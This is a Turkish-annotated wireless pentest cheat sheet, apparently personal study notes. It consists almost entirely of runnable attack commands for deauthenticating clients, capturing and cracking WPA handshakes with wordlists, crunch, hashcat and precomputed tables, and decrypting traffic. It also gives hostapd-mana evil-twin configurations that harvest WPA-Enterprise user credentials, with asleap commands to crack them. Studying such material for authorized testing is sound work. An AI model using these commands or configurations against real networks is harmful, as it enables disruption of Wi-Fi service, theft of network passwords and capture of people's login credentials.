Wireless Pentest

Hazırlık

airmon-ng # Wireless Interfaces
airmon-ng check # Kapatilması gereken servisleri listeler
airmon-ng check kill # Servisleri kapatir
airmon-ng start wlan0 # Monitor modu başlatır
airmon-ng start wlan0 2 # Belirli bir kanalda baslatir
airmon-ng stop wlan0mon # Monitor modu kapatır

iw dev wlan0mon info # Interface bilgileri gösterir
iwconfig wlan0mon # Aynı

Airodump (Sniffing)

airodump-ng -c 2 wlan0mon # Access Point ve Station Gösterir ve handshake toplar
airodump-ng -c 2 --bssid <AP_BSSID> wlan0mon # Sadece belirli AP'yi izler
airodump-ng --output-format csv,pcap wlan0mon # Çıktı formatı belirler

SPACE # Pause Start
TAB # Scroll
M # Renk Seçme
A # Görüntüleme Seçimi
S # Sorting Seçenekleri

Aireplay (Trafik Oluşturma)

aireplay-ng -9 wlan0mon # Inject edilebilen ap'leri listeler (Tek channel olmalı)
aireplay-ng -9 -e testwifi -a <AP_BSSID> wlan0mon # Tek AP'de test eder
aireplay-ng -9 -e testwifi -a <AP_BSSID> wlan0mon -D # AP Detection kapar
aireplay-ng -9 -i wlan1mon wlan0mon # Card-to-card injection (Daha sağlıklı)


aireplay-ng -0 1 -a <AP_BSSID> -c <STATION_BSSID> wlan0mon # Death Saldırısı
aireplay-ng -0 1 -a <AP_BSSID> wlan0mon # Broadcast Deauth

Aircrack (Handshake Kırma)

aircrack-ng -S # Benchmark

# Handshake ile parola kırar
aircrack-ng -w usr/share/john/password.lst -e wifiname -b <AP_BSSID> wpa.cap

Airdecap

airdecap-ng -b <AP_BSSID> test.cap # Cap dosyasında filtreleme yapar
airgraph-ng -i wifi.csv -o capr.png -g CAPR # Client-to-AP-Relationship grafiği
airgraph-ng -i wifi.csv -o capr.png -g CPG # Client Probe Grafiği

# Trafiği çözer
airdecap-ng -b <AP_BSSID> -e wifiname -p password123 wpa.cap

Deauth Saldırısı

BSSID Lookup: https://www.wireshark.org/tools/oui-lookup.html

ESSID Lookup: https://wigle.net/

airodump-ng wlan0mon # Saldıracağımız ağı buluyoruz (Client olmalı)
airodump-ng -c 3 -w wpa --essid wifi_name --bssid <AP_BSSID> wlan0mon
aireplay-ng -0 1 -a <AP_BSSID> -c <STATION_BSSID> wlan0mon
aireplay-ng -0 1 -a <AP_BSSID> wlan0mon

aircrack-ng -w /usr/share/john/password.lst -e wifi_name -b <AP_BSSID> wpa-01.cap
airdecap-ng -b <AP_BSSID> -e wifi_name -p password123 wla-01.cap

Wordlist Rules

code /etc/john/john.conf # Line 961 regex rules
john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifi_name -w - wpa-01.cap

# @ lowercase or setted chars
# , uppercase
# % numbers
# ^ symbols
crunch 8 9 abc123 # a3aac2311
crunch 11 11 -t Password%%% # Password984
crunch 1 1 -p abcde12345 # 53ed214cba
crunch 1 1 -p dog bird fox # birdfoxdog
crunch 5 5 -t ddd%% -p dog bird fox # foxdogbird86
crunch 5 5 aADE -t ddd@@ -p dog bird fox # foxdogbirdAE

crunch 8 9 abc123 | aircrack-ng -e wifi_name wpa-01.cap -w -

rsmangler --file wordlist.txt --min 12 --max 13 --output mangled.txt
rsmangler --file wordlist.txt | aircrack-ng -e wifi_name wpa-01.cap -w -

hashcat -I # OpenCL varsa çok yavaş direkt aircrack kullan
hashcat -b -m 2500
hashcat --help

/usr/lib/hashcat-utils/cap2hccapx.bin wpa-01.cap output.hccapx
hashcat -m 2500 output.hccapx /usr/share/john/password.lst

Airolib

airolib-ng wifi.sqlite --import essid essid.txt
airolib-ng wifi.sqlite --import passwd /usr/share/john/password.lst
airolib-ng wifi.sqlite --batch
airolib-ng wifi.sqlite --stats

aircrack-ng -r wifi.sqlite wpa-01.cap # Çok daha hızlı kırar önceden hesaplandığı için

Cowpatty

genpmk -f /usr/share/john/password.lst -d wifihashes -s wifi_name
cowpatty -r wpa-01.cap -d wifihashes -s wifi # Çok daha hızlı

Rogue AP

ESSID ve BSSID
Auth Türü (WEP, WPA, WPA2, WPA3)
PSK var mı
Channel No

airodump-ng -w discovery --output-format pcap wlan0mon
# wlan.fc.type_subtype == 0x08 && wlan.ssid == "wifi_name"

# Wireless Management > Tagged Params > Vendor Specific
# Wireless Management > Tagged Params > RSN (WPA2)
# Wireless Management > Tagged Params > RSN > Pairwise List (TKIP)
# Wireless Management > Tagged Params > Vendor Specific > Unicast List (TKIP)
# Wireless Management > Tagged Params > RSN > Auth Key Management (PSK)
# Wireless Management > Tagged Params > Vendor Specific > Auth Key Management (PSK)

code wifi_name-mana.conf
interface=wlan0
ssid=wifi_name
channel=1
ieee80211n=1
hw_mode=g # 2.4ghz=g 5.ghz=a
wpa=3 # WPA=1 WPA2=2 İkiside=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=password123 # Fark etmez
wpa_pairwise=TKIP CCMP
rsn_pairwise=TKIP CCMP
mana_wpaout=/root/Desktop/wifi_name.hccapx

hostapd-mana wifi_name-mana.conf
# Eğer bizim AP gerçek AP'den daha yakınsa hedefe Handshake alabiliriz
aireplay-ng -0 0 -a <AP_BSSID> wlan0mon
aircrack-ng wifi_name.hccapx -e wifi_name -w /usr/share/john/password.lst

WPA Enterprise

Küçük işletmeler için mantıklı çünkü bir private key ile bağlanılıyor.
Büyük işletmelerde bu key çalınabilir o yüzden mantıksız.

airodump-ng wlan0mon # AUTH MGT Gözükmeli
airodump-ng -c 2 -w wifi_name wlan0mon
aireplay-ng -0 1 -a <AP_BSSID> -c <CLIENT_BSSID>


wlan.bssid==<AP_BSSID> && eap && tls.handshake.certificate
# Aşağıdaki sertifikayı bulup export packet bytes yapıyoruz (cert.der)
# Extensibele Auth Protocol > TLS1.2> Handshake>Certificate>Certificate 2.

openssl x509 -inform der -in cert.der -text # Kontrol edebiliriz

code /etc/freeradius/3.0/certs/ca.cnf
code /etc/freeradius/3.0/certs/server.cnf
# 49-56 arasını sertifikadaki bilgiler ile değiştiriyoruz

cd /etc/freeradius/3.0/certs/
rm dh
make # Bir daha sertifikaları derliyoruz. Sonda hata verebilir normal

code /etc/hostapd-mana/mana.conf

ssid=wifi_name
interface=wlan0
driver=nl80211
channel=1
hw_mode=g
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=password123
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout/tmp/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1

code /etc/hostapd-mana/mana.eap_user

*      PEAP,TTLS,TLS,FAST
"t"    TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2   "password123"   [2]

hostapd-mana /etc/hostapd-mana/mana.conf
# Eğer bir kullanıcı parola girerse asleap olan komutu kopyala
asleap -C xxxxx -R xxxxxxxxxxxx -W /usr/share/john/password.lst
cat /tmp/hostapd.credout

PreviousFlare VM NextPage

Last updated 1 year ago

hashtagHazırlık

hashtagAirodump (Sniffing)

hashtagAireplay (Trafik Oluşturma)

hashtagAircrack (Handshake Kırma)

hashtagAirdecap

hashtagDeauth Saldırısı

hashtagWordlist Rules

hashtagAirolib

hashtagCowpatty

hashtagRogue AP

hashtagWPA Enterprise

Hazırlık

Airodump (Sniffing)

Aireplay (Trafik Oluşturma)

Aircrack (Handshake Kırma)

Airdecap

Deauth Saldırısı

Wordlist Rules

Airolib

Cowpatty

Rogue AP

WPA Enterprise